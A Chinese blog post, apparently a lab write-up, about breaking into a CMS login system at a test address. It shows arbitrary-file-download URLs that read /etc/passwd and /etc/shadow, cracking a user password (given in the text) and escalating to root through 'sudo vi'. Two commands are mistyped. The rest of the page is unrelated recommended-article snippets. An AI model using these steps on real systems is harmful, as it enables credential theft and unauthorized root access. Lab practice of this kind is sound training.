cms[Goodby登录系统] 172.168.20.33

已于 2022-04-02 22:51:53 修改
阅读量3.5k 收藏
点赞数 2
文章标签: 安全漏洞 任意文件下载 权限提升 密码破解 远程登录
于 2022-04-02 22:51:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65170972/article/details/123930523
版权

1.基本信息:

IP:172.168.20.33

漏洞扫描:发现是任意文件下载漏洞

 

 2.漏洞详情

    具体步骤

(1)发现一个源代码中的下载链接,尝试修改链接为:/etc/passwd,发现可以下载

           Payload: http://172.168.20.33/download.php?f=/etc/passwd

(2)下载shadow:http://172.168.20.33/download.php?f=/etc/shadow

 把下好的文件拖到kali虚拟机里面, ls 查看验证

Kali破解密码命令:johu shadow

破解到一个普通用户账号密码:lihua/12345678

 利用其3389远程登陆服务登陆并进行提权

 Sudo vi 进入vi模式后Esc健退出编辑 :!/bin/bsh

 查看权限已经成功

 提权成功

小同丶布布
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
音悦Mini v1.2.20.33.zip
07-08
音悦Mini v1.2.20.33更新日志 优化操作体验 若干bug修复 音悦Mini的安装   把下载好的安装包解压到当前文件夹,之后双击【YinYueMini_1.2.19.10_Setup.exe】运行文件进行安装,打开的时候会出现安装框,依次...
音悦台mini客户端 v1.2.20.33 官方版.rar
07-09
音悦mini客户端(YinYueMini)是一款小巧的客户端软件。...音悦台mini客户端1.2.16.131214版* 新增视频类型必选功能音悦台mini客户端 1.2.16.130906版* 新增自动登录、更换账号功能* 支持手机号登录* 视频下载支持防盗链
Goodbye Windows!
Thinking in Freedom
02-17 543
终于下定决心要告别Windows了。从大学三年级开始,我一直用双系统的电脑,也就是同时安装了Windows和Linux。第一次接触Linux是在99年,听说是由一个芬兰的大学生写了一个内核放到网上,再由一群热爱自由的黑客一起修改和维护,最后发展成一个强大的操作系统。这样的故事对于计算机系的学生来说简直就是一个传奇,就像好莱坞大片里的施瓦辛格一样,忍不住心动要见识一下Linux到底是什么样子。那
Codeforces GoodBye2013 解题报告
weixin_33785972的博客
12-31 77
第一次能和div1的大神们一起比赛,甚是紧张。只做出来三题,先贴一下吧。 Problem ANew Year Candles 题意:有若干新蜡烛,用完两个旧蜡烛就能造一个新蜡烛,每个蜡烛能燃烧1小时。问最多能燃烧多少个小时? 思路:这道题直接爆,虽然有点傻但是比赛的时候保险。 代码如下: 1 #include <iostream> 2 #include &lt...
网段划分
开开的博客
11-10 7897
什么是网段 对于IP地址,我们是分类管理的: IP是由四段数字组成,在此, IP:4294967296,43亿; IPv6 281474976710656A类: 0 7位网络号 24位主机号B类: 10 14位网络号 16位主机号C类: 110 21位网络号 8位主机号 A类IP段: 1.0.0.0 到126.255.255.255 (0段和12...
使用JAVA实现图形用户化界面的用户登录系统
goodbyepig的博客
04-01 3709
使用JAVA实现图形用户化界面的用户登录系统
[K8S]The connection to the server 192.168.0.2:6443 was refused
一杯咖啡半杯糖的博客
05-26 387
The connection to the server 192.168.0.2:6443 was refused - did you specify the right host or port?
Killet.TRANSDAT.v20.33.Multilanguage 1CD+TOPOWIN
chuodi1591的博客
09-21 321
Killet.TRANSDAT.v20.33.Multilanguage 1CD ESurvey CADD v13.02 & Civil Tools v2.10 2CD Mentor.Graphics.FloEFD.16.1.v37xx.Suite.Win64 5CD PROK...
cause by java,Caused by: java.sql.SQLException: 无法转换为内部表示解决方法
weixin_39611546的博客
03-12 1680
Hibernate应用有三种开发方式:自底向上从数据库到持久化类;自顶向下从持久化类到数据库表;从中间出发向上和向下同时发展。如果从下往上开发,使用Database Explorer反向生成PO,其中的配置文件并不那么智能,比如如下规则NUMBER(1)~NUMBER(18) 都可以使用 Long 来映射一般 NUMBER(1)~NUMBER(9) 使用 Integer 映射NUMBER(10)~...
【力扣】难度【简单】9. 回文数
丶鹏
12-24 101
标题:9. 回文数 难度:简单 描述: 目标:给你一个整数 x ,如果 x 是一个回文整数,返回 true ;否则,返回 false 。 回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/palindrome-number 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 题解: class Solution {
大学生消费调查报告.docx
12-15
购物支出占20.33%,反映出大学生对物质消费的追求。交通、通讯开支占比14.63%,显示了信息化时代大学生对便捷通讯和出行的需求。社交、学习、娱乐等支出占比也较为显著,体现了大学生社交需求和自我提升的愿望。 3....
大学消费调查报告范文.docx
12-15
调查显示,大学生的主要消费支出集中在伙食上,占比33.33%,其次是购物(20.33%)和交通、通讯(14.63%)。交际费用、学习支出、娱乐消费分别占13.01%、8.94%和9.76%。这些数据表明,大学生的消费主要用于基本生活...
利用3Com路由器配置帧中继建立县支行网络.pdf
10-09
假设省级网络的局域网IP为100.1.1.0,路由器的广域网接口IP为20.33.1.1;市级网络的局域网IP为100.21.1.0,路由器的广域网接口IP为20.33.21.1;而县级网络的局域网IP为100.21.21.0,路由器的广域网接口IP为20.33.x.x...
mac下ssh连接linux服务器设置免密登陆
goodbyedaoke的博客
04-03 1478
这是自己的第一篇blog首先,因为自己工作需要经常会在mac电脑上连接服务器,以前一直使用的第三方的ssh连接工具但是,由于第三方的发的工具有的是英文的,有的是收费的,汉化的又有些功能不太完整,直到后面在网上查了一下,可以用终端设置到系统配置文件里,让你的登陆指令变成系统命令,实现免密登陆自己也是为了方便总结和记录,遂写下这篇博客好了费话不多说,开始第一步:生成rsa公钥和秘钥,ssh-keyge...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 539
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
解决 js中 20.33*100 的数值精度问题
07-13
在这个例子中,可以将 `20.33` 乘以 `100` 转换为 `2033`,然后再将结果除以 `100`,得到正确的结果。 ```javascript let result = (20.33 * 100) / 100; // 2033 ``` 2. 使用 `toFixed()` 方法:`toFixed()` 方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值